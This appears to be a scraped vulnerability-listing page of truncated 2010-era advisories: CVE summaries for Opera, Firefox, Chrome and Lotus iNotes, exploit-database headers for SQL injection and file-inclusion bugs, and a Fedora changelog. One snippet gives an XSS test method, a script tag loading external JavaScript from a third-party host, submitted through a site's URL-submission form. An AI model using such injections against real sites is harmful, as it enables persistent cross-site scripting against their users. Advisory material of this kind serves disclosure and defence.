CVE-2010-4049

Opera before 10.63 allows remote attackers to cause a denial of service application crash via a Flash movie with a transparent Window Mode aka wmode property, which is not properly handled during navigation away from the containing HTML document...

Mozilla cross-site information disclosure via modal calls

Mozilla Firefox before 3.5.14 and 3.6.x before 3.6.11, Thunderbird before 3.0.9 and 3.1.x before 3.1.5, and SeaMonkey before 2.0.9 do not properly handle certain modal calls made by javascript: URLs in circumstances related to opening a new window and performing cross-domain navigation, which...

Denial of Service (DoS) Vulnerability in JP1/Desktop Navigation Built-in Database

Overview When JP1/Desktop Navigation used in a cluster environment receives unexpected data, the built-in database process and unit abend, which may cause the management server service to fall into a denial of service DoS condition. Impact A remote attacker could cause a denial of service DoS...

WysGui 2.3 Multiple Vulnerabilities

Exploit for php platform in category web applications =================================== WysGui 2.3 Multiple Vulnerabilities =================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1...

sFileManager 24a - Local File Inclusion

sFileManager 24a - Local File Inclusion -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= sFileManager eNYe-Sec - www.enye-sec.org - www.pepelux.org ----- by the author ----- Simple File Manager SFM is a web based file management utility. It is designed to be used by those that don't wan...

sFileManager 24a - Local File Inclusion

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= sFileManager eNYe-Sec - www.enye-sec.org - www.pepelux.org ----- by the author ----- Simple File Manager SFM is a web based file management utility. It is designed to be used by those that don't want to use ftp or SHOULD NOT use ftp. It c...

Mozilla SSL spoofing with history.back() and history.forward()

The nsDocShell::OnRedirectStateChange function in docshell/base/nsDocShell.cpp in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, and SeaMonkey before 2.0.6, allows remote attackers to spoof the SSL security status of a document via vectors involving multiple requests, a redirect, and...

Dynamic photo gallery V1.02 SQL Injection Vulnerability

Exploit for php platform in category web applications ======================================================= Dynamic photo gallery V1.02 SQL Injection Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 ...

1 1 4. Site Navigation Station system of V1. 1 3 XSS cross-site attacks-vulnerability warning-the black bar safety net

url-submit/index. php to submit the data is not filtered directly into the database,resulting in a savings ofXSSvulnerability Test method: In the Site Name column fill in thescript src=http://www. hackqing. cn/qingexp. js/script（src is fill in your own js file for the address,don't tell me that t...

Fedora 11 : glpi-0.72.4-2.svn11035.fc11 (2010-5188)

This version correct several bugs. Full upstream changelog : Bug 1893: Unable to access to the model of phones dictionnary Bug 1904: Vlan not add using Template Bug 1906: Message-ID should not use $SERVER'HTTPHOST' Bug 1918: configured listlimitmax not honnoured Bug 1941: Disconnecting a port...

114啦网址导航建站系统 V1.13存在XSS、CSRF漏洞

114啦网址导航是目前国内使用率最高的网址导航之一，该网址导航生成系统为雨林木风自主研发，现正式开源宣传，将帮助更多站长轻松搭建网址导航网站。 url-submit/index.php对提交的数据未过滤直接插入数据库,造成了持久型XSS漏洞。 V1.13 厂商补丁： 114la ------- 目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本： http://www.114la.com/ 在网站名称那一栏填写script...

Online Notebook Manager SQL Injection Vulnerability

Exploit for php platform in category web applications =================================================== Online Notebook Manager SQL Injection Vulnerability =================================================== Author: L0rd CrusAd3r aka VSN email protected Exploit Title: Online Notebook Manager SQ...

CafeEngine CMS V2.3 SQL Injection Vulnerability

Exploit for php platform in category web applications =============================================== CafeEngine CMS V2.3 SQL Injection Vulnerability =============================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 ...

Unfixed XSS vulnerability at www.gsmtrack.nl

Security researcher Xylitol, has submitted on 30/05/2010 a cross-site-scripting XSS vulnerability affecting www.gsmtrack.nl, which at the time of submission ranked 269316 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 06/07/2010. It is current...

Google Chrome Multiple File Type Security Bypass

Google Chrome is a web browser developed by Google Inc. It provides rich web browsing similar to other web browsers such as Firefox, Opera, and Internet Explorer. Chrome is unique from other browsers because it follows a multi-process architecture: by default, a separate process is allocated to...

CVE-2010-0655

Use-after-free vulnerability in Google Chrome before 4.0.249.78 allows user-assisted remote attackers to cause a denial of service application crash or possibly execute arbitrary code via vectors involving the display of a blocked popup window during navigation to a different web site...

CVE-2010-0655

Use-after-free vulnerability in Google Chrome before 4.0.249.78 allows user-assisted remote attackers to cause a denial of service application crash or possibly execute arbitrary code via vectors involving the display of a blocked popup window during navigation to a different web site...

CVE-2010-0276

IBM Lotus iNotes aka Domino Web Access or DWA before 229.241 for Domino 8.0.2 FP3 does not properly handle navigation of the "Try Lotus iNotes anyway" link from the page that reports use of an unsupported browser, which has unspecified impact and attack vectors, aka SPR LSHR7TBMQU...

Input validation

IBM Lotus iNotes aka Domino Web Access or DWA before 229.241 for Domino 8.0.2 FP3 does not properly handle navigation of the "Try Lotus iNotes anyway" link from the page that reports use of an unsupported browser, which has unspecified impact and attack vectors, aka SPR LSHR7TBMQU...

Safari < 4.0.4 Multiple Vulnerabilities

Binary data 5232.prm...